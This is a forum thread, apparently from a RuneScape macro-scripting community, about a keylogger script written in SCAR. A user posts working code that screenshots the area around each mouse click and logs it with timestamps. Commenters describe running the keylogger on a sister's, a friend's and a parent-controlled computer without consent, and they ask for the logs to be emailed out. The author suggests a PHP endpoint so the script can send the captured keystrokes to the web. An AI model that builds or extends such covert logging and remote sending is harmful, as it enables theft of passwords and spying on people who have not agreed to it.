You Mean You can hack ppls account with this?
You Mean You can hack ppls account with this?
You can track every key that is pressed on YOUR computer with this. If it is used for logging a person's username and password, that is your business. I feel that is a horrible thing to do if you use this to steal a person's account or take things away without giving them back. But it is your choice on how you want to use this.
It's my hope that this will be used only for the purpose on keeping an eye on what the family or friends do on the computer while you are away.
heey, ron this is amazing, i tested it on mys sis here computer (i already knew her pass)
could you make something that it will send the text to my email? or pm me on a forum? i am not that good with that stuff![]()
~Hermen
I could work on that, but that may be a little difficult. I would need to use scar's post variables and everything. I'll try my best.![]()
this is 1 piece of awsome code
Oh, my Fricking GOD!
This is AMAZING!!! Ron, how on Earth did you manage to create such a beastly thing dude, this is honestly amazing. I ran it just as a joke thinking it would be fake or not work or something, but it works perfectly...
I honestly would have never thought such a thing exists man, holy cow! AMAZING WORK!
Also T-BOLT, how about you read ahead first off and then actually comment? Don't be a moron and post useless stuff like "u mean u kan hak ppl wit dis?" Yes, you can if you were smart enough to read ahead and find out for yourself.
Version 2 Of Sig, made my own vectors, used my own character and everything.
http://img248.imageshack.us/img248/7...goodsigxp7.png
The Shilo Fisher has been halted temporarily. Sorry guys... Too much school work at the moment.![]()
![]()
![]()
erm aint keyloggers and threads about keyloggers kinda not allowed
either way this is wicked
im making an annotation appalet/drawing baord its coming along quite well
Blank!
Ron obviously didn't post it to be used in harmful ways
Dude, is there a way to record mouse clicking?
Ie, timing how long the mouse has been pressed down and released, and the movements it took.
If you know a way, please shareCause then it could help with our 'antiban', ie we do a function a few times and notice that our clicking patterns are much different to that of a bot, and we add that extra human-ness :O
I dunno soz![]()
this is the l33test non rs script evs.
this is going to be very useful for me. thanks!!
Heh, I should run this whenever I go to sleep and have a friend over so I can tell what sites hes been going on. One time I woke up, opened up my laptop, clicked on windows media player.... That's all I have to say.
Thanks for all the great comments. Please let me know if you find a bug or some kind of problem with the keylogger. I want to make it perfect.![]()
Scar crashes whole the time when i press run
I just tested both scripts using SCAR 3.15. Works for me.
What SCAR version are you using JaMe$?
Ron if you are looking for some new things to add to the keylogger you could take a look at some things I have put in mine, because it also saves to an HTML file.
And I wouldn't mind you using anything.
SCAR Code://Checks to see if the mouse is held down
//Saves a picture of the screen as a link and shows a dot where you clicked
//Red for left click and blue for right click
//When hovering over the link it displays what time the click happened
//Clicking the link brings up the picture in another window
procedure MouseDown;
var
Side, Down: boolean;
x, y, a, b, Bmp: integer;
begin
if IsMouseButtonDown(true) then
begin
Side:= true;
Down:= true;
end;
if IsMouseButtonDown(false) then
begin
Side:= false;
Down:= true;
end;
if Down then
begin
GetMousePos(x, y);
Bmp:= BitmapFromString(600, 600, '');
CopyClientToBitmap(Bmp, x - 300, y - 300, x + 300, y + 300);
if Side then
begin
for a:= 296 to 304 do
for b:= 296 to 304 do
FastSetPixel(Bmp, a, b, 255);
end else
begin
for a:= 296 to 304 do
for b:= 296 to 304 do
FastSetPixel(Bmp, a, b, ClBlue);
end;
//Text is the var i use that gets written to the HTML file
Text:= Text + '<a href="Click' + IntToStr(PicNumber) +
'.bmp" title="' + TheTime + '" target="_blank">[Click]</a>';
SaveBitmap(Bmp, Folder + 'Click' + IntToStr(PicNumber) + '.bmp');
Inc(PicNumber);
repeat
Wait(1);
until not IsMouseButtonDown(Side);
end;
end;
And i use this line for any time i want to show what time something happened without taking up room-
SCAR Code:Text:= Text + '<a href="" title="' + TheTime + '" target="_blank">What you want to put goes here</a>';
And one thing i would suggest-
Saving to the file every certain amount of time is a huge help, because when using your keylogger i always forgot it was on and turned off my computer.
Then all the keylogged info was gone :/
But very nice keylogger,
Keep up the good work.
Sorry if I sound Like an idiot here, but have you updated this since the first release. I remember using this when you first released it, and it was excellent!
-----
If I see you autoing with level 3/default clothes/crap name I WILL report you. Auto Correctly. - put this in your sig
Pini, all you are doing is going around spamming and gravedigging. Stop it.
<3
Originally Posted by Eminem
I have not gravediggen any thread, this was (if you actually look at the dates) re-risen by gamer716 who posted on 05-09-2008, 07:29 PM when the previous was at 05-03-2008, 08:30 PM . I have replied asking a question which I have solved on 09-20-2008, a meer two weeks. This is not considered Grave digging, please get your termonology right.
You are only writing this as you are still angered by own own faults in mis-interpretting what I said previously. Do not follow though other discrepancies into other threads.
-----
If I see you autoing with level 3/default clothes/crap name I WILL report you. Auto Correctly. - put this in your sig
Grave digging in the Other Scripts section only applies when a script is unusable by the latest SCAR, is broken, is not used by anyone, or has been superseded by a better script. This script is none of the above, so feel free to comment, suggest features to make the script less of a hassle, attach a variation, or even submit bugs (if there are any).
Off topic... well actually on topic lol:
A pending feature would be to add a GUI. However, this is one script that does not need one.
@almost, that seems like a cool feature. The only fault I can see with that is people click their mouses all the time, and the number of screenshots would be ... exponential. I don't want to add a feature that will take up too much space on someone's computer. Although, since you have already added the feature to your keylogger, here is a cool suggestion. Maybe implement some Javascript/Ajax (not sure if Ajax is needed) and make a slideshow of all the screenshots with the time and date stamped on each one.
Thanks for all the nice comments. Hope everyone likes the script.![]()
DFM Form Parser - SCAR Obfuscator - Master Keylogger - RuneScape Stats Grabber - Index Cards
So this wont be considered as a gravedig? according to the above..^^![]()
Either way, if this is a gravedig sorry but otherwise:
This script is awesome and it is soooo useful for knowing what everyone is doing on my computer lol. This is awesome. Thanks so much Ron.
P.S: the heavy version is the greatest!
I used this when my mom installed a program on my computer which I needed a password to uinstall (It was 'ChildControl', used to control how long the computer is able to be turned on).
Great script!![]()
Awesome!
Always needed a script like this, just wonder that i didn't see it before O_o..
Thx for the grave digging.
EDIT: i have an idea... it would be great if it can send the log to the E-mail.
Hi
Well seems like no one has any problems with this keylogger. I'm beginning to think it was released without any bugs.
You could make a PHP script with get variables. Upload that and then have the script use the SendToWeb feature and with that, it will email you all the keystrokes.
Just do it for your own computer.![]()
DFM Form Parser - SCAR Obfuscator - Master Keylogger - RuneScape Stats Grabber - Index Cards
There are currently 1 users browsing this thread. (0 members and 1 guests)